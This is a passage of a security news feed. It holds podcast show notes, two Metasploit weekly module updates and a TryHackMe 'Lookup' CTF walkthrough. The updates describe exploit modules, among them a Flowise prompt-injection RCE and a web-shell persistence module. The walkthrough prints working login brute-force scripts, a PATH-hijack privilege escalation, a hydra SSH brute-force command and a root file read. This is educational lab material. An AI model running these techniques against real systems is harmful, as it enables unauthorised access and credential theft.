Assistant. Few Are Ready to Govern One</strong></p> <p>Explore a growing reality many professionals can relate to: the appeal of using AI agents to handle the work that keeps piling up - from inbox management to research and logistics - and the governance challenges that quickly follow. The real barrier to scaling personal or enterprise AI agents isn't the technology itself, but defining clear roles, access boundaries, oversight, and lifecycle management. As organizations deploy more autonomous AI agents, the same identity frameworks used to govern workforce and non-employee identities must now evolve to manage AI-driven access before scale and risk outpace control.</p> <p>This segment is sponsored by Saviynt. Learn more or get a free demo at <a rel="noopener" target="_blank" href="https://securityweekly.com/saviyntidv">https://securityweekly.com/saviyntidv</a></p> <h3>Identiverse Interview with Jaime Lewis-Gross from Saviynt</h3> <p><strong>From Sales Engineer to Forward Deployed Engineer: The Rise of Hybrid Technical Roles</strong></p> <p>As technology organizations evolve, technical roles are becoming increasingly fluid - particularly at the intersection of product, engineering, and customer success. This conversation explores what it means to be a modern sales engineer and how the role is increasingly expanding into responsibilities often associated with forward deployed engineers: translating complex technical capabilities into real-world outcomes, solving customer challenges in real time, and serving as a critical bridge between product teams and end users. At the center of this evolution is a customer-first mindset - one that prioritizes listening, adaptability, and long-term partnership. As organizations race to innovate, the companies that stand out will be those that remain deeply focused on customer needs while empowering technical teams to operate beyond traditional role boundaries.</p> <p>This segment is sponsored by Saviynt. Learn more or get a free demo at <a rel="noopener" target="_blank" href="https://securityweekly.com/saviyntidv">https://securityweekly.com/saviyntidv</a></p> <h3>Identiverse Interview with Kim Brown from LexisNexis</h3> <p><strong>Stop Identity Fraud: Modern Strategies for Insurance and Healthcare</strong></p> <p>Identity fraud is growing more sophisticated across both insurance and healthcare, making identity management a critical line of defense. In this executive interview, Kim Brown, VP of Product Management, will explore how organizations can strengthen identity verification, authentication, and risk assessment to reduce fraud while improving user experiences. The discussion will highlight emerging threats, evolving regulatory expectations, and practical strategies for deploying identity solutions at scale. Attendees will gain actionable insights to protect customers, patients, and their organizations without adding friction.</p> <p>This segment is sponsored by LexisNexis Risk Solutions. Visit <a rel="noopener" target="_blank" href="https://securityweekly.com/lexisnexisidv">https://securityweekly.com/lexisnexisidv</a> to learn more about them!</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/esw">https://www.securityweekly.com/esw</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/esw-467">https://securityweekly.com/esw-467</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hungry? We talk Smoked Meat, Poutine, and Bagel - also, Identiverse Interviews! - ESW #467]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:2 Interview with François Proulx from Boost Security

Software Supply Chain Security: Build Pipeline (CI/CD) Exploitation

Boost Security is the creator of some very popular build pipeline security tools, like Bagel and Poutine....]]></description>
<link>https://tsecurity.de/de/3664747/it-security-video/hungry-we-talk-smoked-meat-poutine-and-bagel-also-identiverse-interviews-esw-467/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664747/it-security-video/hungry-we-talk-smoked-meat-poutine-and-bagel-also-identiverse-interviews-esw-467/</guid>
<pubDate>Mon, 13 Jul 2026 11:17:45 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:2 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/ywJwPPIWDOU?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Interview with François Proulx from Boost Security<br />
<br />
Software Supply Chain Security: Build Pipeline (CI/CD) Exploitation<br />
<br />
Boost Security is the creator of some very popular build pipeline security tools, like Bagel and Poutine. Today, we discuss their latest tool, Smoked Meat. They describe it as "Like Metasploit, but for CI/CD pipelines".<br />
<br />
Segment Resources:<br />
- Smoked Meat announcement: https://labs.boostsecurity.io/articles/introducing-smokedmeat<br />
- Smoked Meat github: https://github.com/boostsecurityio/smokedmeat<br />
- Smoked Meat demo: https://www.youtube.com/watch?v=F5Hr_201Au8 with Guillaume and François<br />
<br />
Dr. John Prichard from Radiant Logic<br />
<br />
The Three Identity Problem: Surviving Identity Security's Chaotic Era<br />
<br />
Identity security has entered its chaotic era. Human, non-human, and agentic AI identities no longer just coexist. They form an uncontrolled inheritance chain in which a human creates an agent, the agent spins up service principals, OAuth grants, and role assignments, and that whole chain keeps running long after the human changes roles or leaves. Most of these chains are being spawned by business users on low-code and enterprise AI platforms, outside traditional identity controls and largely invisible to security.<br />
<br />
In this segment, Radiant Logic CEO Dr. John Pritchard joins us to unpack why this is no longer a visibility problem. It is an observability problem. And it is shifting the center of gravity in identity security from authentication to authorization. Listeners will leave with a clearer view of where their current IAM, IGA, and NHI programs fall short, and a practical lens for governing the rapidly expanding population of AI agents already inside their environments.<br />
<br />
To go deeper on what John discussed today, watch Radiant Logic's on-demand webinar Identities Under Attack: How Adversaries Exploit the Human-Machine-Agent Divide at https://securityweekly.com/radiantlogicidv.<br />
<br />
Cassie Christensen from Saviynt<br />
<br />
Everyone Wants an AI Assistant. Few Are Ready to Govern One<br />
<br />
Explore a growing reality many professionals can relate to: the appeal of using AI agents to handle the work that keeps piling up - from inbox management to research and logistics - and the governance challenges that quickly follow. The real barrier to scaling personal or enterprise AI agents isn’t the technology itself, but defining clear roles, access boundaries, oversight, and lifecycle management. As organizations deploy more autonomous AI agents, the same identity frameworks used to govern workforce and non-employee identities must now evolve to manage AI-driven access before scale and risk outpace control.<br />
<br />
This segment is sponsored by Saviynt. Learn more or get a free demo at https://securityweekly.com/saviyntidv<br />
<br />
Jaime Lewis-Gross from Saviynt<br />
<br />
From Sales Engineer to Forward Deployed Engineer: The Rise of Hybrid Technical Roles<br />
<br />
As technology organizations evolve, technical roles are becoming increasingly fluid - particularly at the intersection of product, engineering, and customer success. This conversation explores what it means to be a modern sales engineer and how the role is increasingly expanding into responsibilities often associated with forward deployed engineers: translating complex technical capabilities into real-world outcomes, solving customer challenges in real time, and serving as a critical bridge between product teams and end users. At the center of this evolution is a customer-first mindset - one that prioritizes listening, adaptability, and long-term partnership. As organizations race to innovate, the companies that stand out will be those that remain deeply focused on customer needs while empowering technical teams to operate beyond traditional role boundaries.<br />
<br />
This segment is sponsored by Saviynt. Learn more or get a free demo at https://securityweekly.com/saviyntidv<br />
<br />
Kim Brown from LexisNexis<br />
<br />
Stop Identity Fraud: Modern Strategies for Insurance and Healthcare<br />
<br />
Identity fraud is growing more sophisticated across both insurance and healthcare, making identity management a critical line of defense. In this executive interview, Kim Brown, VP of Product Management, will explore how organizations can strengthen identity verification, authentication, and risk assessment to reduce fraud while improving user experiences. The discussion will highlight emerging threats, evolving regulatory expectations, and practical strategies for deploying identity solutions at scale. Attendees will gain actionable insights to protect customers, patients, and their organizations without adding friction.<br />
<br />
This segment is sponsored by LexisNexis Risk Solutions. Visit https://securityweekly.com/lexisnexisidv to learn more about them!<br />
<br />
Visit https://www.securityweekly.com/esw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/esw-467<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Metasploit Update: Exploits for FlowiseAI CSV Agent and MacOS Package Kit]]></title>
<description><![CDATA[More AI, more software, more bugs!AI, it's all you hear about nowadays and everyone's got an opinion on it. Here at Metasploit, we care less about those opinions and more about the growing attack surface all this new software brings with it (yeehaw exploits!). Take for example the new Flowise CSV...]]></description>
<link>https://tsecurity.de/de/3661054/it-security-nachrichten/weekly-metasploit-update-exploits-for-flowiseai-csv-agent-and-macos-package-kit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661054/it-security-nachrichten/weekly-metasploit-update-exploits-for-flowiseai-csv-agent-and-macos-package-kit/</guid>
<pubDate>Sat, 11 Jul 2026 02:51:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>More AI, more software, more bugs!</h2><p>AI, it's all you hear about nowadays and everyone's got an opinion on it. Here at Metasploit, we care less about those opinions and more about the growing attack surface all this new software brings with it (yeehaw exploits!). Take for example the new Flowise CSV Agent Prompt Injection RCE brought to you by Takahiro Yokoyama and zdi-disclosures. Flowise is an open-source tool that lets you build AI apps and chatbots using a visual, drag-and-drop canvas and CVE-2026-41264 is an unauthenticated RCE run method of the CSV_Agents class in Flowise. The vulnerability exists due insufficient sandboxing and an incomplete list of disallowed inputs. It allows unauthenticated attackers to upload a .csv file containing arbitrary python code and execute it. One moment you're using AI to help draft and email and the next moment you're getting pwn'd, what a world we live in! Happy Friday and happy hacking everyone.</p><h2>New module content (3)</h2><h3>Apache .htaccess Persistence</h3><p>Authors: 4ravind-b, msutovsky-r7, and wireghoul</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21473">#21473</a> contributed by <a href="https://github.com/4ravind-b">4ravind-b</a></p><p>Path: linux/persistence/apache_htaccess</p><p>Description: Adds a new persistence module, exploits/linux/persistence/apache_htaccess, that plants wireghoul's mod_cgi .htaccess web shell on a Linux Apache target.</p><h3>Flowise CSV Agent Prompt Injection RCE</h3><p>Authors: Takahiro Yokoyama and zdi-disclosures</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21407">#21407</a> contributed by <a href="https://github.com/Takahiro-Yoko">Takahiro-Yoko</a></p><p>Path: multi/http/flowise_auth_rce_cve_2026_41264</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-41264&amp;referrer=blog">CVE-2026-41264</a></p><p>Description: This adds a new exploit module for FlowiseAI Flowise (CVE-2026-41264). The CSV Agent feature evaluates LLM-generated Python code without proper sandboxing, allowing a prompt injection to achieve arbitrary code execution as the user running the server. Flowise versions 1.3.0 through 3.0.13 are affected. The module requires an API key with chatflows:create permission but does not require Flowise authentication to trigger the underlying flaw.</p><h3>macOS PackageKit ZSH Environment Privilege Escalation</h3><p>Authors: Mykola Grymalyuk and h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21499">#21499</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: osx/local/packagekit_zshenv_privesc</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2024-27822&amp;referrer=blog">CVE-2024-27822</a></p><p>Description: This adds a new local privilege escalation module for macOS targeting CVE-2024-27822 in PackageKit.framework. When a PKG installer script uses a ZSH shebang, PackageKit runs it as root while inheriting the installing user's environment, causing ZSH to source the user's ~/.zshenv with root privileges. The module plants a payload in ~/.zshenv that fires only when running as root, then opens a minimal PKG with Installer.app; once the user approves the installation prompt and authenticates, the payload executes as root and a root session is returned. Affected versions are macOS 14.4, 13.6.6, 12.7.4, and 11 and earlier; the issue is patched in 14.5, 13.6.7, and 12.7.5.</p><h2>Enhancements and features (5)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21416">#21416</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This updates the Exploit::Remote::Ftp mixin to improve target fingerprinting. It now leverages recog to fingerprint targets from their banners and adds ftp_fingerprint and ftp_list_directory methods to assist with target enumeration.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21436">#21436</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Improved UX for reloading of library files.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21579">#21579</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This adds a few extra fields to some MCP Server tools to align with recent RPC changes in the framework. The msf_service_info tool now has resource and parents fields, the msf_vulnerability_info tool now has a resource field, the msf_note_info tool now has a data field, and the msf_credential_info tool now has new realm_key and realm_value fields.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21580">#21580</a> from <a href="https://github.com/Pushpenderrathore">Pushpenderrathore</a> - This adds a Certificate Signing Request (CSR) Trace to the CertificateTrace functionality. Users can now opt to see the CSR get printed when requesting certificates from AD CS.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21637">#21637</a> from <a href="https://github.com/eve0805">eve0805</a> - This adds improved levels of granularity to the KerberosTicketTrace functionality. Users can now choose to print the full kerberos trace output, only the tickets or only the metadata.</li></ul><h2>Bugs fixed (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21588">#21588</a> from <a href="https://github.com/vinicius-batistella">vinicius-batistella</a> - Fix a bug in the format dispatcher where although we can generate AARCH64 windows exe files, we fail trying to do so because the dispatcher does not properly handle the request by the user.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21651">#21651</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This fixes a bug in the Role Based Constrained Delegation (RBCD) module that prevented Access Control Entries (ACEs) from being removed due to a type mismatch while comparing Security Identifiers (SIDs).</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-07-01T09%3A42%3A42Z..2026-07-08T13%3A32%3A18-07%3A00%22">Pull Requests 6.4.142...6.4.143</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.142...6.4.143">Full diff 6.4.142...6.4.143</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lookup: TryHackMe CTF Walkthrough]]></title>
<description><![CDATA[Lookup TryHackMe WalkthroughLab link: https://tryhackme.com/room/lookupTitle: Test your enumeration skills on this boot-to-root machineDescription: Lookup offers a treasure trove of learning opportunities for aspiring hackers. This intriguing machine showcases various real-world vulnerabilities, ...]]></description>
<link>https://tsecurity.de/de/3651404/hacking/lookup-tryhackme-ctf-walkthrough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651404/hacking/lookup-tryhackme-ctf-walkthrough/</guid>
<pubDate>Tue, 07 Jul 2026 13:54:45 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Lookup TryHackMe Walkthrough</h3><p><strong>Lab link:</strong> <a href="https://tryhackme.com/room/lookup">https://tryhackme.com/room/lookup</a></p><p><strong>Title:</strong> Test your enumeration skills on this boot-to-root machine</p><p><strong>Description</strong>: <strong>Lookup</strong> offers a treasure trove of learning opportunities for aspiring hackers. This intriguing machine showcases various real-world vulnerabilities, ranging from web application weaknesses to privilege escalation techniques. By exploring and exploiting these vulnerabilities, hackers can sharpen their skills and gain invaluable experience in ethical hacking. Through “Lookup,” hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities, such as command injection, and understand the significance of secure coding practices. The machine also challenges hackers to automate tasks, demonstrating the power of scripting in penetration testing.</p><p><strong>Note:</strong> It is recommended to use your own VM if you’ll ever experience problems visualizing the site</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/986/1*3aT7PfFEAjKiOdieKbrNlw.png"><figcaption><strong>AI</strong> Generated</figcaption></figure><h3>1. Scanning &amp; Enumeration</h3><p>Find open ports: nmap TARGET_IP</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/733/1*ne9sD7uJiWs8DM_TGTqHYw.png"><figcaption>nmap initial scan</figcaption></figure><p>Perform version scan to discover more details about the services running on these open ports: nmap -sV -p22,80 TARGET_IP</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/963/1*D6RStQbJcqnj0E5NGYIH-Q.png"><figcaption>discover versions</figcaption></figure><p><a href="https://infosecwriteups.com/sqhell-manually-hunting-sql-injection-with-detailed-explanation-8fd24360c65e">SQHell: Manually hunting SQL injection with detailed explanation</a></p><h4>Web</h4><p>Visiting the IP address in web browser, did not respond , using wget to make a web request on the target IP address:<br> wget <a href="http://target_ip/">http://TARGET_IP:80/</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/952/1*IFKybxTTiOj5UHi2I-PtUA.png"><figcaption>testing web service</figcaption></figure><p>From above image it is clear that server is not responding to direct IP address instead expecting a request to a domain lookup.thm</p><p>Let’s map the target IP address to this domain lookup.thm in the system /etc/hosts file: sudo vim /etc/hosts</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/471/1*osBSzq6MXo_e-98TTs_n5Q.png"><figcaption>/etc/hosts file</figcaption></figure><p>Now, by accessing the http://lookup.thm:80 in a web browser, a login page appears</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*LwgrDItwyfd0-hTyeTLv0g.png"><figcaption>lookup.thm</figcaption></figure><p>Tried multiple credentials &amp; SQL injection techniques, but login failed &amp; redirected back to the login page</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/674/1*BroVRxEioIHx7R_RE0OU9g.png"><figcaption>Login Failed</figcaption></figure><p>Kept trying, but on submitting the credentials for the username adminthe response differs from the other invalid credentials</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/706/1*rhSwKU-P3T7M6A10vvwIxQ.png"><figcaption>username: admin</figcaption></figure><p>The above response displays that the username was correct (in this case admin), this allows us to enumerate all the users of the application</p><h4>Enumerating Usernames</h4><p>Using following <strong>python</strong> script to brute force the login page to enumerate for the valid usernames on the target website</p><pre>import requests<br>import urllib3<br>import sys<br><br>#proxies = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}<br>url = "http://lookup.thm/login.php"<br>GREEN = '\033[32m'<br>RESET = '\033[0m'<br><br>def login_req(url, word):<br>    data = {<br>            "username":"%s" %word,<br>            "password":"pass123"<br>            }<br>    res = requests.post(url=url, data=data, verify=False)<br>    if "Wrong password" in res.text:<br>        sys.stdout.write(GREEN + "\rUsername found: " + word + "\n" + RESET )<br>    elif "Wrong username" in res.text:<br>        sys.stdout.write('\r'+word)<br>        sys.stdout.flush()<br>    else:<br>        sys.stdout.write(res.text)<br>        sys.exit(-1)<br><br>if __name__ == "__main__":<br>    if len(sys.argv) != 2:<br>        print("[+] Usage: %s wordlist" %sys.argv[0])<br>        print("[+] Example: %s /usr/share/seclists/Username/Name/names.txt" %sys.argv[0])<br>        sys.exit(-1)<br>    wordlist = sys.argv[1]<br>    with open(wordlist, "r") as wordlist_file:<br>        for line in wordlist_file:<br>            word = line.strip()<br>            login_req(url, word)</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/946/1*LlOs4bFIIXHl9I1hMcY5dg.png"><figcaption>Username Bruteforce</figcaption></figure><p>Once usernames found perform brute-force against these two users to find their valid password. Here is the modified version of above script to brute-force the user’s password:</p><pre>import requests<br>import urllib3<br>import sys<br><br>#proxies = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}<br>url = "http://lookup.thm/login.php"<br># Color constants<br>RED = '\033[31m'<br>GREEN = '\033[32m'<br>RESET = '\033[0m'<br>def login_req_user(url, user, word):<br>    data = {<br>            "username":"%s" %user,<br>            "password":"%s" %word<br>            }<br>    res = requests.post(url=url, data=data, verify=False)<br>    if "Wrong password" not in res.text and "Wrong username"  not in res.text:<br>        print("Credentials Found: " + GREEN + user + " " + RED + word + RESET)<br>        return "Found"<br>    if "Wrong password" in res.text or "Wrong username"  in res.text:<br>        print("Credentials: " + GREEN + user + " " + RESET + word)<br>        return "Not Found"<br><br>if __name__ == "__main__":<br>    if len(sys.argv) != 3:<br>        print("[+] Usage: %s user wordlist" %sys.argv[0])<br>        sys.exit(-1)<br>    user = sys.argv[1]<br>    wordlist = sys.argv[2]<br>    with open(wordlist, "r") as wordlist_file:<br>        for line in wordlist_file:<br>            word = line.strip()<br>            status = login_req_user(url, user, word)<br>            if status == "Found":<br>                break<br>            if status == "Not Found":<br>                continue</pre><p>Password for one non-admin user has been found:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/615/1*kYWpIM872tLIZh7bRkfpxQ.png"><figcaption>Password Found for non-admin user</figcaption></figure><p>Using these credentials login to the website, which redirects to another subdomain:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*90gD7U7IjrWMCxbqI256Lg.png"><figcaption>SUBDOMAIN.lookup.thm</figcaption></figure><p>To access this subdomain add it to the /etc/hosts file and refresh the page:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/637/1*9FsjdtLhzln8XYkb2LUfEQ.png"><figcaption>/etc/hosts file</figcaption></figure><h4>Looking for Vulnerability</h4><p>Once log in to to the website a file management interface is displayed on the page, but further exploring this page provides the detail about the software running as a file manager. Website is using the <strong>elFinder</strong> file manager having an outdated version <strong>2.1.47</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MswnGReu0j0XpufwBLXcYA.png"><figcaption>elFinder Version</figcaption></figure><p>Google search results displayed websites using <strong>elFinder Version 2.1.47</strong> are vulnerable to the command injection vulnerability, allowing attacker to perform arbitrary command execution on the system “<strong>CVE-2019–9194”</strong></p><h3>2. Exploitation</h3><p>Search for the exploit <strong>elFinder</strong> using Metasploit, make necessary changes and run the exploit to gain RCE on the system</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_jzv61mbg_7AbNQLhGoPyQ.png"><figcaption>elfinder exploit</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_t0QJNnAMLaMk6WHrDXS1A.png"><figcaption>run exploit to gain RCE</figcaption></figure><h3>3. Privilege Escalation: think</h3><p>Search for the SUID binary on the target machine using command: find / -type f -perm -04000 -ls 2&gt;/dev/null<br>Result from above command contains an uncommon but suspicious SUID binary on the partial compromised system which should be further investigated</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7fpm2LE3uUEKtMTEomYbRw.png"><figcaption>suspicious SUID binary</figcaption></figure><p>By running /usr/sbin/pwm shows that it is using command id to display the username &amp; user ID and appends that username to the /home/&lt;USERNAME&gt;/.password to do something with this file</p><p>As the /usr/sbin/pwm is not using absolute path to the /bin/id , instead relying on the environment variable to locate the id command, so attacker can manipulate this SUID binary by exploiting to display any other result when id command is executed by the SUID:</p><h4>Steps to exploit:</h4><ol><li>Create a world executable malicious file within the /tmp directory having same name id as a command called by the SUID binary</li></ol><pre>#!/bin/bash<br>echo "uid=1000(think) gid=1000(think) groups=1000(think)"</pre><p>2. Prepend /tmp directory as the first entry to your $PATH environment variable: export PATH=/tmp/id:$PATH</p><p>3. Execute the vulnerable SUID: /usr/sbin/pwm</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/804/1*FLtQ3pEQMN40Kg0OuQO7zw.png"><figcaption>/usr/sbin/pwm output</figcaption></figure><p>The output content can be used as a wordlist to bruteforce another service (<strong>SSH</strong>) running on this target machine</p><p>Create a wordlist from the content displayed by exploiting /usr/sbin/pwm SUID, and run a bruteforce attack against the user think using following command:<br>hydra -l think -P wordlist_ssh.txt TARGET_IP ssh -t 5</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5QeinqYBp-yR1uGx3SAfNQ.png"><figcaption>SSH bruteforce</figcaption></figure><p>Once credentials found, login to the ssh as think user and obtain user.txt</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/610/1*mmhkIJixH5__8Pi93k8bLg.png"><figcaption>user.txt</figcaption></figure><h3>4. Privilege Escalation: root</h3><p>Once access gained to the user <strong>think</strong>, further enumerate the machine to look for privilege escalation to the super user <strong>root</strong><br>Using sudo -l to list commands that user <strong>think</strong> can run with root privileges:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0lpCrruIQ_HBVy4rVhenrA.png"><figcaption>sudo binaries</figcaption></figure><p>Using /usr/bin/look to read /root/root.txt flag: sudo /usr/bin/look '' /root/root.txt</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/889/1*qBfxIXdqgKwIroNT3Gn33w.png"><figcaption>root.txt</figcaption></figure><p>If you want more walkthroughs on CTF challenges, detailed writeups on Web Hacking and exploitatoin techniques, follow me here on <a href="https://medium.com/@huzaifa_X_malik">Medium</a> to stay update and get notified</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=3caf2a7efb45" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/lookup-tryhackme-walkthrough-3caf2a7efb45">Lookup: TryHackMe CTF Walkthrough</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Metasploit Update: Modules for SMB-to-Meterpreter, Peyara Remote Mouse RCE exploit, and more]]></title>
<description><![CDATA[It's Time to Upgrade Your SMB SessionThis week, Metasploit contributor Dean Welch has added an SMB to Meterpreter session upgrade module. It uses PsExec to facilitate the upgrade. Users can load the module with use windows/manage/smb_to_meterpreter and specify the session number they wish to upgr...]]></description>
<link>https://tsecurity.de/de/3651010/it-security-nachrichten/weekly-metasploit-update-modules-for-smb-to-meterpreter-peyara-remote-mouse-rce-exploit-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651010/it-security-nachrichten/weekly-metasploit-update-modules-for-smb-to-meterpreter-peyara-remote-mouse-rce-exploit-and-more/</guid>
<pubDate>Tue, 07 Jul 2026 11:24:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>It's Time to Upgrade Your SMB Session</h2><p>This week, Metasploit contributor Dean Welch has added an SMB to Meterpreter session upgrade module. It uses PsExec to facilitate the upgrade. Users can load the module with use <span data-type="inlineCode">windows/manage/smb_to_meterpreter</span> and specify the session number they wish to upgrade. This functionality is also available with the command <span data-type="inlineCode">sessions -u &lt;session_id&gt;</span>. This work is part of an overarching effort to enable a variety of session types to be upgraded to Meterpreter when possible.</p><h2>New module content (3)</h2><h3>Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution</h3><p>Author: tmrswrr</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21491">#21491</a> contributed by <a href="https://github.com/capture0x">capture0x</a></p><p>Path: <span data-type="inlineCode">windows/misc/peyara_remote_mouse_rce</span></p><p>Description: Adds an exploit module for Peyara Remote Mouse v1.0.1 unauthenticated RCE.</p><h3>Linux Execute Command</h3><p>Authors: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> and modexp</p><p>Type: Payload (Single)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21239">#21239</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Path: <span data-type="inlineCode">linux/loongarch64/exec</span></p><p>Description: Adds a new linux/loongarch64/exec command payload.</p><h3>SMB to Meterpreter Upgrade via PsExec</h3><p>Author: Dean Welch</p><p>Type: Post</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21581">#21581</a> contributed by <a href="https://github.com/dwelch-r7">dwelch-r7</a></p><p>Path: <span data-type="inlineCode">windows/manage/smb_to_meterpreter</span></p><p>Description: Adds the ability to upgrade authenticated SMB sessions to Meterpreter sessions using PsExec techniques.</p><h2>Enhancements and features (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21527">#21527</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Adds authentication support to the MCP server's HTTP transport by default.</li></ul><h2>Bugs fixed (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21618">#21618</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Fixes a crash when running the <span data-type="inlineCode">scanner/discovery/udp_sweep</span> module on Windows environments.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21624">#21624</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a bug with SSH session's debug information showing the incorrect value <span data-type="inlineCode">localuser @</span> instead of <span data-type="inlineCode">ssh_user @ ssh_ip</span>.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-06-24T23%3A18%3A10Z..2026-07-01T09%3A42%3A42Z%22">Pull Requests 6.4.141...6.4.142</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.141...6.4.142">Full diff 6.4.141...6.4.142</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Host & Network Penetration Testing: Exploitation CTF 2 — eJPT (INE)]]></title>
<description><![CDATA[A walkthrough covering SMB brute-forcing, Pass-the-Hash attacks, FTP credential reuse, and ASPX webshell upload to capture all four flags.Hello everyone!In this blog, I’ll walk through Exploitation CTF 2 from INE’s eJPT path. One Windows target, four flags — and if you read the questions carefull...]]></description>
<link>https://tsecurity.de/de/3644766/hacking/host-network-penetration-testing-exploitation-ctf-2-ejpt-ine/</link>
